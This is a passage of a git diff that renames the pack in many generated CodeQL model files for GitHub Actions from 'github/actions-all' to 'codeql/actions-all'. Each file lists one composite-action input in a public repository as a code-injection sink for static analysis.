6fdfb2e6eba0..1aa3eedfe897 100644 --- a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["randombit/botan", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml index b068e810823e..aa9670d3de3c 100644 --- a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml index 9107fd9e85cf..79cc879fa67c 100644 --- a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml index ee81ae110455..f8964efbc562 100644 --- a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml index a8030627789f..102d0aa85e56 100644 --- a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml index a89b000bedff..c1743b69eb21 100644 --- a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml index a98ea12496f6..47a1811b49f7 100644 --- a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml index 8475ef342402..9941f981d758 100644 --- a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml index fff5eaab1f49..eac3e751bdea 100644 --- a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml index 5d0cef62b0b4..3c613a4eb882 100644 --- a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml index 3edfa5ef14db..b846058b3f06 100644 --- a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml index d5f640e91a59..7337d8896f37 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml index 32945cb21e30..3c6675a13c9e 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml index 42eeca98de4c..9f0f612d1a60 100644 --- a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml index 5c0777ce394a..9e5715f26385 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml index ac777af02856..02fe0539869e 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml index 26a587e4f5c6..86be8acfeea0 100644 --- a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml index a26ebcfa57dc..fff292f42bbd 100644 --- a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml index bf39b24e8411..141c52a8ccd3 100644 --- a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["scitools/iris", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml index 00cb4906bb51..a073f87d9454 100644 --- a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml index 85f583a5e880..5e10745332bd 100644 --- a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml index 207b5705e513..e278f0849bff 100644 --- a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml index f0f3be91b4ba..45598fe4bc78 100644 --- a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml index 04e779b9579a..f1689c520290 100644 --- a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml index 7939469934e8..00ae4bfb9b85 100644 --- a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml index 1af5c9435afb..1bd2cf924182 100644 --- a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml index bcb9dc853d6d..2dc89f564f5d 100644 --- a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml index ec5b1a4e50c4..9dbd2fce9892 100644 --- a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml index 2f0bb66127b4..7722a6353072 100644 --- a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml index 65953f0387ab..4fc41527037c 100644 --- a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml index 035e331a007f..729aa139693e 100644 --- a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml +++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml index 1cf431a75736..e08457ef5ea7 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml index 669d7f443b13..c19a1fc3eef1 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml index b53f09499031..a719b0dc87e7 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml index 4e9af4a1a8eb..9a9b3a5d3df8 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml index 3fd31a3612fa..3f9b4ea61cc5 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml index 090bf1afc851..6e36f5dea2be 100644 --- a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml index 47afbc44f765..f1b143d7c44f 100644 --- a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml index 4e173c717e57..42d9df16b35d 100644 --- a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 8091471b3c03..386b0aa6ea94 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml index a3b3a5624c1e..54bf59f06470 100644 --- a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml index 22264f3f29f9..2a2a8fcc2063 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml index e33a45e698ba..05dbdf6bf45b 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml index a2d5e1ef7a33..4276ce4b98dd 100644 --- a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml index e0ae2bc70bdb..ac210c93a1ec 100644 --- a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml index 7926fa4e083e..501d4a8a45f5 100644 --- a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml index 2369c82bcb7a..b582844dc7c8 100644 --- a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml index d388b1a55b31..9de223281878 100644 --- a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml index dade6e8c958a..7234c3cbd5f4 100644 --- a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml index 9ac87054f10a..27ee66eae484 100644 --- a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml index 3f9f3f632070..96586d295343 100644 --- a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml index aff068890ad4..5e7e997272d3 100644 --- a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml index 0304e585bb6f..8a9326121006 100644 --- a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["unidata/metpy", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml index 46950d380cbb..494e71db707b 100644 --- a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["unstructured-io/unstructured", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml index 2e3c2530ebae..200f6bbfc437 100644 --- a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml index 58f3d831423d..a542370c7de2 100644 --- a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + 